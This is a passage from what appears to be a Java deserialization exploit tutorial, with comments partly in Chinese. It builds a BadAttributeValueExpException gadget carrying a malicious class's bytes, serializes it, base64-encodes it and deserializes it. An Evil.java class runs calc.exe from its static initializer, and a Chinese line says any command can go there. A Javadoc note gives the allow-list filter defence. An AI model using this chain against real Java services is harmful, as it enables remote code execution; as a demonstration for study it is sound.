FileInputStream fis = new FileInputStream(clzFile); fis.read(clzBytes); //read file into bytes[] fis.close();
payload.setClassByte(clzBytes);
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException("placeholder"); Field field = badAttributeValueExpException.getClass().getDeclaredField("val"); field.setAccessible(true); field.set(badAttributeValueExpException, payload);
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream out = new ObjectOutputStream(byteArrayOutputStream);
out.writeUTF("gadgets"); out.writeInt(2021);
out.writeObject(badAttributeValueExpException);
//String data = byteArrayOutputStream.toString(); String data = Tools.base64Encode(byteArrayOutputStream.toByteArray());
System.out.println(data); byte[] b = Tools.base64Decode(data); InputStream inputStream = new ByteArrayInputStream(b); ObjectInputStream objectInputStream = new ObjectInputStream(inputStream); String name = objectInputStream.readUTF(); int year = objectInputStream.readInt(); if (name.equals("gadgets") && year == 2021) { objectInputStream.readObject(); } }catch (Exception e){ e.printStackTrace(); } } }
Evil.java 的 static 初始化块中写上要执行的命令即可，类被初始化时该代码块会自动运行。
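/**
 * Demonstration class whose only behavior lives in a static initializer.
 *
 * <p>The JVM runs a static initializer once, when the class is initialized, so the command
 * below starts without any method of this class being called explicitly. Any code path that
 * defines and initializes a class from untrusted bytes therefore has to be treated as
 * executing untrusted code.
 *
 * <p>Defensive note: a reader of serialized data should restrict which classes an
 * {@code ObjectInputStream} may resolve (for example with an allow-list installed through
 * {@code java.io.ObjectInputFilter}) instead of relying on checks made on other fields of
 * the stream before {@code readObject()} is called.
 */
public class Evil {
    static {
        try {
            // Argument-array form of exec: the program name is passed as-is, with no shell parsing.
            Process p = Runtime.getRuntime().exec(new String[]{"calc.exe"});
            // Blocks class initialization until the child process exits.
            p.waitFor();
        } catch (InterruptedException e) {
            // Restore the interrupt flag so the initializing thread still sees the interruption.
            Thread.currentThread().interrupt();
            e.printStackTrace();
        } catch (Exception e) {
            // Kept broad on purpose: an exception escaping a static initializer would surface
            // as ExceptionInInitializerError instead of this stack trace.
            e.printStackTrace();
        }
    }
}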